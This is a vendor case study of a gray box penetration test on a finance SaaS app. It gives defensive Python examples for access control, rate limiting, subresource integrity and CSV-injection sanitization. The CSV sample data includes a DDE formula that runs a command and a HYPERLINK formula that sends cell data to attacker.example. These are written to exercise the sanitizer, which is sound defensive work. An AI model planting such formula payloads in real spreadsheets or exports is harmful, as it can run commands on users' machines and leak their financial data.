Gray Box Penetration Testing for an Enterprise Finance SaaS

Industry
BFSI, Software products

About Our Customer

The Customer is a US-based SaaS company offering workforce management and financial management solutions.

Need for a Pentesting Vendor with Expertise in Financial Software

To ensure the maximum security of its clients’ financial data, the Customer was looking for a cybersecurity vendor with experience in the finance sector. Trusting our expertise in cybersecurity and financial IT, the Customer turned to ScienceSoft to examine the web application for its spend management SaaS platform.

Pentesting Revealed Security Flaws Endangering Clients’ Financial Data

ScienceSoft’s experts conducted security testing of the Customer’s web app following the PTES, the OWASP Web Security Testing Guide (WSTG), and NIST SP 800-115. The process started with a vulnerability assessment: our testers scanned the target application and then manually validated every detected weakness to eliminate false positives.

To evaluate the real-world impact of the identified security gaps, ScienceSoft’s team performed gray box pentesting. After receiving low-privilege user credentials from the Customer, the team explored the vulnerabilities from the position of an attacker who already holds a regular account in the target web application (for example, a compromised or malicious user), which is the scenario in which authorization flaws matter most.

During the pentesting, ScienceSoft revealed authentication and authorization flaws, missing resource and rate limits (unbounded pagination and no request throttling), security misconfigurations, CSV injection flaws, and other security issues. Our pentesters suggested protective measures to secure the Customer’s app, including:

  • Enforcing server-side access control so that regular users cannot reach data or functions intended for privileged users, both in the UI and on the underlying API endpoints (a hidden menu item is not an access control). Otherwise, broken access control could result in sensitive data disclosure, data manipulation, or data loss.
  • Enforcing request rate limiting and strict server-side caps on pagination parameters (page size and page number). Without these restrictions, an attacker can overload the server by flooding it with requests or by asking for far more rows than a page needs, causing excessive resource consumption, database performance degradation, and denial of service (DoS).
  • Implementing subresource integrity (SRI) checks for scripts loaded from third-party domains, so that the browser refuses to execute a script whose content no longer matches the hash pinned in the page. This reduces the risk that a tampered or compromised third-party script leaks user data or executes malicious JavaScript in users’ sessions; the trade-off is that every legitimate script update requires updating the pinned hash.
  • Implementing input validation that rejects cells beginning with formula-trigger characters (=, +, -, @, tab, carriage return) in the website forms whose data can be imported from or exported to CSV, and sanitizing field values when app content is exported as CSV (for example, by prefixing such cells with a single quote and quoting the field). These measures protect users who open exported files in spreadsheet software from CSV injection, where a crafted cell is evaluated as a formula and, through features such as DDE or HYPERLINK, can run commands on the user’s workstation (after the spreadsheet’s security prompts) or exfiltrate data from the sheet.
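The first two recommendations above (object-level access control plus hard limits on pagination and request rate) can be seen together in one request-handling layer. The following is an added example written for this page, not the Customer's code: the expense-report records, the role names (user, manager, admin), the 5 requests/s budget with a burst of 10, and the page caps are all assumptions chosen for illustration. The handlers return an HTTP status and body the way a view function would, so the behaviour can be checked without a web framework.

```python
import time

# Constructed sample data: expense reports owned by different users.
REPORTS = [
    {"id": 1, "owner": "alice", "dept": "sales", "amount": 120.00},
    {"id": 2, "owner": "bob", "dept": "sales", "amount": 980.00},
    {"id": 3, "owner": "carol", "dept": "finance", "amount": 45.50},
    {"id": 4, "owner": "alice", "dept": "sales", "amount": 310.00},
]

# Server-side bounds (assumed values); nothing the client sends can raise them.
DEFAULT_PAGE_SIZE = 20
MAX_PAGE_SIZE = 50
MAX_PAGE = 10_000


class User:
    def __init__(self, name, role, dept):
        self.name, self.role, self.dept = name, role, dept  # role: user | manager | admin (assumed)


class TokenBucket:
    """Per-user token bucket: `rate` tokens per second, at most `capacity` stored."""

    def __init__(self, rate, capacity):
        self.rate, self.capacity = rate, capacity
        self.tokens, self.updated = float(capacity), None

    def allow(self, now):
        if self.updated is not None:  # refill for the time elapsed since the last call
            self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


_BUCKETS = {}


def check_rate_limit(user, now=None, rate=5.0, capacity=10):
    """True if this request is within the caller's budget (5 req/s, burst 10; assumed)."""
    now = time.monotonic() if now is None else now
    bucket = _BUCKETS.setdefault(user.name, TokenBucket(rate, capacity))
    return bucket.allow(now)


def reset_rate_limits():
    _BUCKETS.clear()


def parse_pagination(params):
    """Clamp page and page_size to server-defined bounds; raise ValueError on bad input."""
    try:
        page = int(params.get("page", 1))
        size = int(params.get("page_size", DEFAULT_PAGE_SIZE))
    except (TypeError, ValueError):
        raise ValueError("page and page_size must be integers")
    if page < 1 or size < 1:
        raise ValueError("page and page_size must be positive")
    return min(page, MAX_PAGE), min(size, MAX_PAGE_SIZE)


def visible_reports(user):
    """The authorization filter lives on the server and depends only on the session's role."""
    if user.role == "admin":
        return list(REPORTS)
    if user.role == "manager":
        return [r for r in REPORTS if r["dept"] == user.dept]
    return [r for r in REPORTS if r["owner"] == user.name]


def list_reports(user, params, now=None):
    """Stand-in for GET /reports. Returns (http_status, body)."""
    if not check_rate_limit(user, now):
        return 429, {"error": "rate limit exceeded"}
    try:
        page, size = parse_pagination(params)
    except ValueError as e:
        return 400, {"error": str(e)}
    rows = visible_reports(user)
    start = (page - 1) * size
    return 200, {"page": page, "page_size": size, "items": rows[start:start + size]}


def get_report(user, report_id, now=None):
    """Stand-in for GET /reports/<id>: the lookup happens inside the caller's scope, so a
    regular user cannot reach another user's record by guessing its id (IDOR)."""
    if not check_rate_limit(user, now):
        return 429, {"error": "rate limit exceeded"}
    for r in visible_reports(user):
        if r["id"] == report_id:
            return 200, r
    return 404, {"error": "not found"}  # 404 rather than 403: do not confirm that the id exists
```

Two design points are worth noting. The authorization check is a filter applied before the lookup, so there is no code path that fetches a record first and decides afterwards, and the rate limiter runs before input parsing so that malformed requests cost the attacker budget too. In production the bucket state would live in a shared store (Redis or similar) rather than a process-local dict, otherwise each application instance enforces its own independent limit.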
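For the SRI recommendation above, the following added example (written for this page, not taken from the Customer or from any library) shows how the `integrity` value is computed, how the tag must be emitted for a cross-origin script, and what the browser does at load time. The script body and the CDN URL are constructed stand-ins.

```python
import base64
import hashlib
import re

# Constructed stand-in for a script served from a third-party domain.
VENDOR_SCRIPT = b"(function(){window.analytics={track:function(e){console.log(e)}}})();\n"
VENDOR_URL = "https://cdn.example-vendor.test/analytics/1.4.2/analytics.min.js"  # assumed


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return the `integrity` attribute value for `content`.
    Browsers accept only sha256, sha384 and sha512; the digest is standard base64."""
    if algorithm not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(url: str, content: bytes) -> str:
    """Pin an exact version of the script. `crossorigin="anonymous"` is required for a
    cross-origin resource; without it the browser cannot read the bytes to hash them
    and refuses to execute the script at all."""
    return f'<script src="{url}" integrity="{sri_hash(content)}" crossorigin="anonymous"></script>'


_INTEGRITY_RE = re.compile(r"^(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)$")


def verify_integrity(content: bytes, integrity: str) -> bool:
    """What the browser does on load: recompute and compare, so any byte change fails.
    The attribute may carry several space-separated hashes; any one match passes."""
    for token in integrity.split():
        m = _INTEGRITY_RE.match(token)
        if not m:
            continue  # unknown algorithm tokens are ignored, exactly as browsers do
        if sri_hash(content, m.group(1)) == token:
            return True
    return False
```

The pinned hash must be regenerated whenever the vendor ships a new version of the file, which is why SRI is only practical with a versioned URL (as above) rather than a `latest` alias.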
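The CSV injection recommendation above has a trap specific to finance software: negative amounts begin with "-", one of the formula-trigger characters, so a naive sanitizer would turn every credit into text. The following added example (written for this page, not the Customer's code) handles that case on both the export and the import side. The field names, sample rows and attacker-style cell values are constructed for the example.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

FIELDS = ["vendor", "memo", "amount"]  # assumed export columns

# Constructed rows as they might sit in the database after a malicious user saved them.
SAMPLE_ROWS = [
    {"vendor": "Acme Ltd", "memo": "Office chairs", "amount": "-450.00"},
    {"vendor": "=cmd|' /C calc'!A0", "memo": "Q3 catering", "amount": "1200.00"},
    {"vendor": "@SUM(1+1)", "memo": '+HYPERLINK("https://attacker.example/?"&A1,"click")', "amount": "12.00"},
]

# Constructed upload that a regular user might submit through the import form.
ATTACKER_CSV = (
    "vendor,memo,amount\n"
    "Acme Ltd,Office chairs,-450.00\n"
    "=cmd|' /C calc'!A0,Q3 catering,1200.00\n"
)


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate the cell. Leading spaces are stripped
    (conservatively), and plain numbers such as "-450.00" or "+3" are allowed through."""
    s = value.lstrip(" ")
    if not s.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(s)
        return False
    except ValueError:
        return True


def neutralize(value: str) -> str:
    """Export-side sanitization: a leading single quote forces the cell to be shown as text."""
    return "'" + value if is_formula_like(value) else value


def export_csv(rows, fieldnames=FIELDS) -> str:
    """Write rows with every field quoted (QUOTE_ALL doubles embedded quotes), so a cell
    cannot break out of its field either."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize(str(row.get(k, ""))) for k in fieldnames})
    return buf.getvalue()


def validate_import(csv_text: str, fieldnames=FIELDS):
    """Import-side validation: reject rather than silently rewrite, and report
    (line number, column, offending value) so the user can fix the file."""
    problems = []
    reader = csv.DictReader(io.StringIO(csv_text))
    for lineno, row in enumerate(reader, start=2):  # line 1 is the header
        for k in fieldnames:
            value = row.get(k) or ""
            if is_formula_like(value):
                problems.append((lineno, k, value))
    return problems
```

Values like "-1,234.56" (thousands separators) fail the float check and are therefore exported as text; if the app formats amounts that way, extend the number check accordingly rather than dropping it. Rejecting on import and neutralizing on export are complementary: the first keeps payloads out of the database, the second protects users when data entered through any other path (the UI, the API, a migration) is downloaded.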

Full Insight Into Web Security Flaws Drives Rapid Remediation

In only ten days, the Customer received a comprehensive report summarizing the testing activities, the assessment results, and a prioritized list of corrective actions for each found vulnerability. Our detailed remediation advice helped the Customer quickly close the identified gaps in its spend management application and substantially reduce the risk to its clients’ sensitive data.

Technologies and Tools

Burp Suite, SSLScan, Nmap, SQLMap, JWT_Tool, Nikto, Zed Attack Proxy (ZAP), PHP, Bash, Python, PowerShell.
